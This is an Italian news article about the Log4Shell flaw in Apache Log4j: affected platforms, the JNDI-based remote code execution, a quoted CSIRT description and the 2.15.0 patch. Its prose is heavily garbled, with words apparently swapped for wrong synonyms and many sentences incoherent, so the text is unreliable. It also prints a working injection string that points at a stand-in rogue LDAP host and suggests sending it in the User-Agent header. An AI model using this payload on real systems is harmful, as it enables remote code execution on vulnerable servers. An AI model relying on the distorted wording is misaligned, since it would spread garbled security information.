\n<\/p>\n
sviluppatori che Apache hanno reso incline un differimento per mezzo di cui annullare la vulnerabilit\u00e0 0-day (CVE-2021-44228<\/a>) le quali affligge la Log4j<\/strong> per mezzo di un di i server che numerose piattaforme copiosamente utilizzate, basti concepire a Minecraft, Steam, Twitter e iCloud, similmente come mai di i client le quali interagiscono per mezzo di queste ultime.<\/p>\n Parliamo che una vulnerabilit\u00e0 (clausola come mai Log4Shell<\/strong>) cos\u00ec carico attraverso un equipollente a 10 su 10 nella gradazione CVSS (Common Vulnerability Scoring System<\/em>), non rettamente che esse un malintenzionato potrebbe dar forza ad RCE<\/strong> (Remote Code Execution<\/em>) eseguendo del regolamento sfornito di fato che e per mezzo di tecniche in relazione basilari. <\/p>\n A tal assunto esisterebbe il Proof of concept<\/a> che un le quali ha avuto come mai target Twitter.<\/p>\n perizia la vulnerabilit\u00e0 deriverebbe attraverso come mai i messaggi che loch vengono gestiti dal log4j, se non altro di un attaccante inviasse un lettera apposta confezionato di cingere un sul paradigma della consecutivo:<\/p>\n il effetto potrebbe esistenza quegli che addossare del regolamento estraneo e che eseguirlo. consecutivo evidenzia ad come mai simile prassi possa esistenza effettuata trafila il citazione ad una JNDI<\/strong> (Java Naming and Directory Interface<\/em>) per mezzo di un the #log4j<\/a> scramble per mezzo di a nutshell pic.twitter.com\/XSwxEJucsI<\/a><\/p>\n \u2014 Yong Sheng (@ystan_) December 13, 2021<\/a><\/p>\n<\/blockquote>\n che un\u2019intreccio malevola sono spiegati<\/a> schiettamente nel resoconto riportato dal CSIRT (Elaboratore elettronico Security Incident Response Team<\/em>):<\/p>\n L\u2019possibile esaurimento della fenditura consente l\u2019 che regolamento a alterazione dell\u2019zelo affetta. aggressori, le quali necessitano che un attacco difensivo al complesso, possono guidare una domanda https malformata trafila una apposta predisposta, di figliare un loch su Log4j \u2013 le quali adotta JNDI (Java Naming and Directory Interface) \u2013 al sottile che enumerare la dannosa nel cambiare registro dell\u2019zelo. All’epoca di l\u2019produzione del cambiare registro, il complesso si trover\u00e0 nelle condizioni che esegue il regolamento apposta inserito dall\u2019 malintenzionato. Questa grado pu\u00f2 ad condurre l\u2019zelo ad adempiere una domanda richiamo un sovranit\u00e0 deleterio di adempiere un payload . questo di l\u2019attaccante sar\u00e0 ipotizzabile il ispezione dell\u2019zelo interessata e l\u2019attacco perfetto al complesso. <\/p>\n<\/blockquote>\n A trasformare specificamente malsicuro la vulnerabilit\u00e0 sarebbe il scena le quali esse coinvolge tutte le soluzioni della Apache Software Foundation dedicate ai contesti enterprise cui ad Struts, Flink, Druid, Flume, Solr e Kafka. Nello uguale potrebbero esistenza esposti a problematiche che progetti come mai Redis, ElasticSearch ed Elastic Logstash.<\/p>\n L\u2019differimento installabile \u00e8 tema nella narrazione 2.15.0 e per mezzo di si sono chiesti se non altro per mezzo di quello stesso si potr\u00e0 trasferire alla normalit\u00e0 una condizione considerata ingiustamente compromessa.<\/p>\n Certi esperti che hanno scena considerare le quali il sarebbe solamente nel evento per mezzo di cui il baldanza del regola Stando similmente le masserizie, il scena che subito sul regola citato modificandone il baldanza per mezzo di Le versioni a sono per mezzo di perizia tutte quelle la 2.0 e la 2.14.1, a ci\u00f2 si aggiunga le quali che diradato Log4j viene utilizzato per mezzo di release che Java datate e obsolete le quali che di s\u00e9 offrono importanti garanzie dal della .<\/p>\n Sorgente<\/em>: Log4j<\/span><\/a><\/p>\n<\/div>\nLog4j: le piattaforme coinvolte<\/h2>\n
\n${jndi:ldap:\/\/rogueldapserver.com\/a})\n<\/code><\/pre>\nUser-Agent<\/code>:<\/p>\n\n
\n
Un differimento finale?<\/h2>\n
log4j2.formatMsgNoLookups<\/code> dovesse esistenza settato su FALSE<\/code>. Oggigiorno nella release 2.15.0 quest\u2019supremo sarebbe governo impostato su TRUE<\/code> e riportarlo su FALSE<\/code> farebbe prossimo le quali invalidare l\u2019tornaconto della patch.<\/p>\nTRUE<\/code> potrebbe originarsi il maggior numero potente le quali adottare un differimento per mezzo di cui viene conservato il baldanza predefinito di log4j2.formatMsgNoLookups<\/code>. <\/p>\n